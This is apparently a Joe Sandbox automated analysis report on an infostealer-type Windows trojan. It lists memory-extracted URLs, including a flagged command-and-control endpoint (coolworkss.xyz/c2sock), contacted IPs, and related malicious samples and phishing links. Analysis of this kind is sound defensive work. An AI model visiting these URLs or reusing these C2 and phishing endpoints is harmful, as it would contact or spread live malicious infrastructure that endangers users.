https://groups.google.com/forum/?pli=1#	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8%26oq%3D.n	explorer.exe, 00000013.00000002.455599716.0000000005CAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455599716.0000000005C86000.00000004.00000001.00020000.00000000.sdmp	false		high
http://coolworkss.xyz/c2sock:	explorer.exe, 00000013.00000002.455198443.000000000333D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://mathiasbynens.be/notes/javascript-encoding	lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://coolworkss.xyz/c2sock3	explorer.exe, 00000013.00000002.455198443.000000000331E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://coolworkss.xyz:80/c2sock	explorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.0000000003367000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://github.com/joyent/node/issues/2631	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://coolworkss.xyz/5	explorer.exe, 00000013.00000002.455198443.000000000334B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/joyent/node/issues/1707	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://stackoverflow.com/a/5501711/3561	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.midnight-commander.org/browser/lib/tty/key.c	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.squid-cache.org/Doc/config/half_closed_clients/	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.worldwildlife.org/c	lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.vmware.com/0/	lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.worldwildlife.org/	lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://rustih.ru/wp-content/uploads/2015/	explorer.exe, 00000013.00000002.455198443.00000000032E7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://c0rl.m%L	lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.symauth.com/cps0(	lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://narwhaljs.org)	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://tools.ietf.org/html/rfc3492#section-3.4	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/favicon.ico	explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://coolworkss.xyz/U	explorer.exe, 00000013.00000002.455198443.000000000331E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfp	explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://code.google.com/p/chromium/issues/detail?id=25916	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://codereview.chromium.org/121173009/	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://coolworkss.xyz:80/c2sock;	explorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.worldwildlife.org/pages/	lJ2eYRm0Bd.exe, 00000000.00000003.217524808.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://coolworkss.xyz/yO3GNZ	explorer.exe, 00000013.00000003.391797031.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.thawte.com/cps0/	lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mths.be/punycode	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.symauth.com/rpa00	lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/isaacs/readable-stream/issues/16	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.freshaddress.biz/js/lib/freshaddress-client-7.0.min.js?token=6075cbbd36a1f0f92cddb595415	lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://foo.com	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.info-zip.org/	lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004F74000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com/ajax/libs/luminateExtend/1.8.3/luminateExtend.min.js	lJ2eYRm0Bd.exe, 00000000.00000003.217524808.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/antirez/linenoise	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.thawte.com/repository0	lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pod.tst.eu/http://cvs.schmorp.de/libev/ev.pod#Be_smart_about_timeouts	lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.worldwildlife.org/pages/our-values	lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmp	false		high
http://coolworkss.xyz/c2sockw	explorer.exe, 00000013.00000002.455543101.00000000059D0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://coolworkss.xyz/c2socky	explorer.exe, 00000013.00000003.363893394.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.362220178.0000000003388000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://i.imgur.com/	lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.worldwildlife.org/?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utm	lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmp	false		high
http://coolworkss.xyz/c2sockt	explorer.exe, 00000013.00000003.375236074.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.391797031.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.359062273.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.360661950.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.362220178.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.357518038.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455543101.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.376847383.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
199.232.32.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
104.18.6.142	wwf.org	United States	13335	CLOUDFLARENETUS	false
104.18.6.94	www.worldwildlife.org	United States	13335	CLOUDFLARENETUS	false
104.21.60.111	unknown	United States	13335	CLOUDFLARENETUS	true
172.67.195.229	coolworkss.xyz	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1303447
Start date and time:	2023-09-05 13:00:23 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	lJ2eYRm0Bd.exe
Original Sample Name:	37bb336d579f839aa98af8218718eae84631c7cdf7ed4586728db333ea724987.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/3@40/5
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 100% (good quality ratio 0%) Quality average: 7% Quality standard deviation: 7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, kv501.prod.do.dsp.mp.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, tse1.mm.bing.net, arc.msn.com
Execution Graph export aborted for target lJ2eYRm0Bd.exe, PID 6968 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: lJ2eYRm0Bd.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipv4.imgur.map.fastly.net	https://calendar.event-invites.com/XYW1wSVFWVmtiSGh0YzNSdmF6WlRUM0JqTVM5dFVpdFFhekZ3YmxSdU1ub3dVVzlJVFdWSFpuSjBkM05aT0VweFFrNTZNM1J6TlZCVldGcENRMUEwTWpBemVIcExhMjlqVkVaUmIzVlZUVkkxUWtGcGJYcEdUVWRTWmpWa1JrSjViR0Y2WlhOd2NDczRkRGhYVGxKVFREQXlWekpNVVVzeFFXMUlZVkpOTVdaT1RDdGthRkpoYm1ob1pUZGhhamhITkVKRGJtVnNhM0pYYUcxclV6RkNiekZpY1daeU9GZGxTaTlpYTFsc2R6VTRXRWRsWlRKTE5YSkpPR3BYVGpORkxTMTBTbXRGZVU5MFZGZHdWSEoyZEdKb2NYVlVWVWxSUFQwPS0tMmZmNDdiNjRhMjkwYzUwNmU3NjAyY2E1ZTk5N2MzM2Y5NTFjZWEzOA==?cid=18149234	Get hash	malicious	Unknown	Browse	146.75.116.193
	https://2fa.com-token-auth.com/XTXpCU1VFeElWRzVGZEhnMkwwZHVRVFIxWmxwMldXVklOSGt5TjNJclMzWTBka3BFUVVwT1psZEtkVGxIWVVwV0x6aDNSVFZTTlhSeFlrTTJlVUpHTTNWVU1pdE9aR05aUWxFMlFqUm9hVU4yYkRRNVpVd3hlazFOVDJKbGFVNU5aSEYzYlZKak5VSlVRbEZXVWpkcmJIbGtMMkZrTlhjdlR6aHVjelZYWjFOd1YxVklPSEIyZFZoMmMyaHlMekp2WTFGR2ExRTVaVzUxYmxnNFdHWm1aemMzU2s5S2NIYzRWa0UwUFMwdFJqZ3lOM1ZsVlZGaGIxcEhWeTk0WVVkVGIwOXlVVDA5LS05NzIxMDAyNDRlYWQ1MTkyYTM3ZDEyYjhlNDA4ZGU4NWQwM2YxNjk5?cid=1695050992	Get hash	malicious	Unknown	Browse	146.75.116.193
	https://2fa.com-token-auth.com/XTXpCU1VFeElWRzVGZEhnMkwwZHVRVFIxWmxwMldXVklOSGt5TjNJclMzWTBka3BFUVVwT1psZEtkVGxIWVVwV0x6aDNSVFZTTlhSeFlrTTJlVUpHTTNWVU1pdE9aR05aUWxFMlFqUm9hVU4yYkRRNVpVd3hlazFOVDJKbGFVNU5aSEYzYlZKak5VSlVRbEZXVWpkcmJIbGtMMkZrTlhjdlR6aHVjelZYWjFOd1YxVklPSEIyZFZoMmMyaHlMekp2WTFGR2ExRTVaVzUxYmxnNFdHWm1aemMzU2s5S2NIYzRWa0UwUFMwdFJqZ3lOM1ZsVlZGaGIxcEhWeTk0WVVkVGIwOXlVVDA5LS05NzIxMDAyNDRlYWQ1MTkyYTM3ZDEyYjhlNDA4ZGU4NWQwM2YxNjk5?cid=1695050992	Get hash	malicious	Unknown	Browse	146.75.120.193
	Purchase Order - Akerbla.htm	Get hash	malicious	HTMLPhisher	Browse	151.101.240.193
	MSC_SHIPPING_DOCUMENTS_Schulergroup_9721.html	Get hash	malicious	HTMLPhisher	Browse	151.101.240.193
	https://bonus-fortune@wa0.ru/tigers/?Participe	Get hash	malicious	HTMLPhisher	Browse	146.75.52.193
	https://robust-backend.ancillarycheese.com/XTUhSREt6ZFdTM1p5Y0haeUwwSlFTVWRwVGpKeFFuYzVUVk5yWkROTmQyMU5hMGxxVVRWMFltbHpSM2RNVDJ0UmNFMW9VbnBETVRVMmRqWllSVWhNSzJSWFRIaDFWbWtyVjNoYWNrRmhabXAzVERWSGEzaGtTSHBNTm5CMlNYbFdlVGh3YVVWTFQzRm9XbmxGWm14V1FuaHRiRGQ2UWpKdk9ERkxUVFpYYnpReVZWSm9VWE5aSzJaeFRYTkhNSFJyUlV0MGVuZFNjbGRsUW5oVFZUSnNNRU56V1N0a04yZEVaSGxyUFMwdE9GSnpZa0VyV0VWak1uZE5URnBUV2tOYWN6QmpaejA5LS03Njc0OGM2OGZhZWJkNzU3OWZkMjlkYjNjMTIyNjYyNjA0ZmZmZjc5?cid=1690512398	Get hash	malicious	Unknown	Browse	151.101.240.193
	https://mail.kb4.io/XYTIwMlNrTjNNVzF1Ykd0a1YzaENjV2RoTmxVMFNFa3pLM2hVYkhkVlpsUTRUWGh1Wm1SQ2RtWk9VREY2TVU5VVNtSXZkVmhZT0RGRVRVNUVjMjlzTjBkQ01VZGhaVTlCYkRoSWMxSldhMkZCVFdwYWVuRnNTalpMZW5GMFUybG9hRE5UTkhsalQyeEpSWGxKTkhaTWVEWk1iMWRSVURKU2EwWXZRVUppTHpoYWFrUjFUMmRHV1ZWeFZUUkdZVFo1ZURGeVMwNWxlWE5QVmtSRk1VczRhRTlFTUdjNU5UaDRPRFZSUFMwdFpEaFJTVVpIVVcxS1EzaFhVbmhtSzJzd1NDOW9VVDA5LS1mNTdhZTE2YTQ5OTVkZDMxMWFiZTA4MmRkZTc2YjgzNjUwOWNiZDU5?cid=1659664590	Get hash	malicious	Unknown	Browse	151.101.240.193
	Setup.exe	Get hash	malicious	Raccoon Stealer v2	Browse	146.75.52.193
	Setup.exe	Get hash	malicious	Raccoon Stealer v2	Browse	151.101.240.193
	4Fau7Mt9J9.exe	Get hash	malicious	SystemBC	Browse	146.75.52.193
	document2.doc	Get hash	malicious	Unknown	Browse	146.75.116.193
	https://onedrive.live.com/redir?resid=DCEE9ABA390AE9B0%2112434&authkey=%21ACk1_FrhDN3hk3c&page=View&wd=target%28Quick%20Notes.one%7Cbbfca687-9e6d-45a7-97ac-fbc8dbf907ed%2Fdenkstatt%20GmbH%7Cd89e380a-9e85-474b-af9c-56f14c5d911c%2F%29&wdorigin=NavigationUrl	Get hash	malicious	HTMLPhisher	Browse	151.101.240.193
	https://pimms.lt.emlnk.com/Prod/link-tracker?notrack=1&redirectUrl=aHR0cHMlM0ElMkYlMkZwdWItZTUxODI0OWVmNDQ3NDI1NzlmOGYyZjFhYzJlZmUwNmEucjIuZGV2JTJGb2ZmaWNlLmh0bWw=&sig=9bswD4QhsaM1qEEMU8hGwodhoQmPsGw8Ddf6tJ6k6etf&iat=1691035306&a=%7C%7C69055402%7C%7C&account=pimms%2Eactivehosted%2Ecom&email=LBhNDmgfHvaMsl1%2FPsB1yn9%2FYOic7udGXTn4Bt90%3Aa4sZychuJBoNP0oYvPEw%2FpbE8yVHlJQf&s=6ebf5ae87ee526aca993872c2675c4bd&i=1A3A1A8#joonwookim@bloomvista.co.kr	Get hash	malicious	HTMLPhisher	Browse	151.101.240.193
	Quarantined Messages (2).zip	Get hash	malicious	Unknown	Browse	146.75.116.193
	message .html	Get hash	malicious	Unknown	Browse	151.101.240.193
	https://2fa.com-token-auth.com/XYW1JNFVVUjJSV1JQVm5wQ1NtdzFha2xtZWpSd2FrYzJiemhEZFU5cVRVczBRalE1UTB4R1pYbzJWV1J6UmtGU1ZHdFhOSEZNUmxsVU9GSm5hMVpZZDFaelNrZHBRelpGVW1RMFNYbzVjbmwyVVZVMWN6VTFlWFYxU1dveFZrOHpaa0pITjBkTmVqTXZVVFJyY0dNclJpOWtNVGh3WW5FNFptUTRiMU5VVkhsbGFXUlhNVVZwVVhGM1JtbFNlbkJxZWs5V1ZrNDJRbU5FY0M5QlMxTnVTVVo0U2tNeFZEWjZSalJKUFMwdFozVkZVMFpyVlZwTmFtSldNRWRTTVdOdFFUWlFaejA5LS05NzAwODk5NzBlYjRjYjIxMmEyODk3ZDg1NmVhMTBkZjk0ZTEyODU5?cid=1659112930	Get hash	malicious	Unknown	Browse	151.101.240.193
	New P0.shtml	Get hash	malicious	HTMLPhisher	Browse	151.101.240.193
	http://vn.happyvalentinesday2020.online/Twin-Cities-Area-Map-Counties-And-4aee.html	Get hash	malicious	Unknown	Browse	151.101.240.193

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	https://in.xero.com/rcIzVV1Aw3le1rpmJnXmjCQw4eEwppCWv5ARUNBQ?utm_source=invoiceEmailPayNowButton#paynow	Get hash	malicious	Unknown	Browse	199.232.32.157
	https://in.xero.com/YpP5d5zURmMawfQ1Dats7DlIMVs8e0vVw1aFKgFA?utm_source=invoiceEmailPayNowButton#paynow	Get hash	malicious	Unknown	Browse	151.101.1.108
	https://in.xero.com/YpP5d5zURmMawfQ1Dats7DlIMVs8e0vVw1aFKgFA	Get hash	malicious	Unknown	Browse	151.101.1.108
	https://in.xero.com/YpP5d5zURmMawfQ1Dats7DlIMVs8e0vVw1aFKgFA	Get hash	malicious	Unknown	Browse	151.101.1.140
	https://irp.cdn-website.com/6e885bb5/files/uploaded/tedidokited.pdf	Get hash	malicious	Unknown	Browse	151.101.1.140
	https://jimdo-storage.global.ssl.fastly.net/file/df3f41da-2a22-4b20-800c-f7338c634115/10679520094.pdf	Get hash	malicious	Unknown	Browse	151.101.1.194
	https://bafybeibxyxajksrfoshmkgtyle54lxb3tftoep6c4nu4744yfo6qpzcdzi.ipfs.cf-ipfs.com/?openboxmailer/auto/eMail.web/987FTmail.authenticate/checking_auth0/authenticate-userid/84778949884903948993839/	Get hash	malicious	HTMLPhisher	Browse	151.101.1.140
	https://3xqoezjop5pbyppog7vv.70ecprr.ru/ef56/	Get hash	malicious	Unknown	Browse	151.101.1.140
	KLKoNDE2QG.elf	Get hash	malicious	Mirai	Browse	199.233.13.38
	https://www.seekpng.com	Get hash	malicious	Unknown	Browse	151.101.194.217
	Install.sh	Get hash	malicious	Unknown	Browse	185.199.111.133
	file.exe	Get hash	malicious	Clipboard Hijacker, ToxicEye	Browse	185.199.110.133
	Yim.Launchpad.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	https://f9e08fa5.813046d4d046dc5fe328d669.workers.dev/	Get hash	malicious	Unknown	Browse	151.101.1.140
	RGRET06N.htm	Get hash	malicious	Unknown	Browse	151.101.8.159
	paiement.xlsx	Get hash	malicious	Unknown	Browse	151.101.1.26
	https://t.co/pHYVQrcmOW	Get hash	malicious	Phisher	Browse	151.101.65.44
	http://thompson-hill.com/authenticationsupport/?userid=	Get hash	malicious	Unknown	Browse	151.101.1.140
	Swift_003001994805009873009940021984003_Bank_of_Baroda_export.jar	Get hash	malicious	STRRAT	Browse	199.232.192.209
	https://unqknkro61lymq5l0vsr.cvk5omd.ru/789qrst7/	Get hash	malicious	Unknown	Browse	151.101.1.140

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ce5f3254611a8c095a3d821d44539877	file.exe	Get hash	malicious	SmokeLoader	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	5yyhzAj6dY.exe	Get hash	malicious	SmokeLoader, Stealc, Vidar	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	file.exe	Get hash	malicious	SmokeLoader, Stealc, Vidar	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	file.exe	Get hash	malicious	SmokeLoader	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	file.exe	Get hash	malicious	SmokeLoader	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	new_order_xlsx.exe	Get hash	malicious	DBatLoader	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	new_order_xlsx.exe	Get hash	malicious	DBatLoader	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	file.exe	Get hash	malicious	SmokeLoader	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	cv4TCGxUjvS.exe	Get hash	malicious	KnightCrypt	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	8_0.exe	Get hash	malicious	KnightCrypt	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	cv4TCGxUjvS.exe	Get hash	malicious	Unknown	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	8_0.exe	Get hash	malicious	Unknown	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	HhcSy5LcAb.exe	Get hash	malicious	Vidar, onlyLogger	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	dbnXGwXFlH.exe	Get hash	malicious	Vidar, onlyLogger	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	mh3J5rNiL7.exe	Get hash	malicious	LummaC Stealer	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	hXc1HKdJz9.exe	Get hash	malicious	LummaC Stealer	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	file.exe	Get hash	malicious	SmokeLoader	Browse	199.232.32.193 104.18.6.94 104.18.6.142
	dhvJVmmIiU.exe	Get hash	malicious	SmokeLoader	Browse	199.232.32.193 104.18.6.94 104.18.6.142

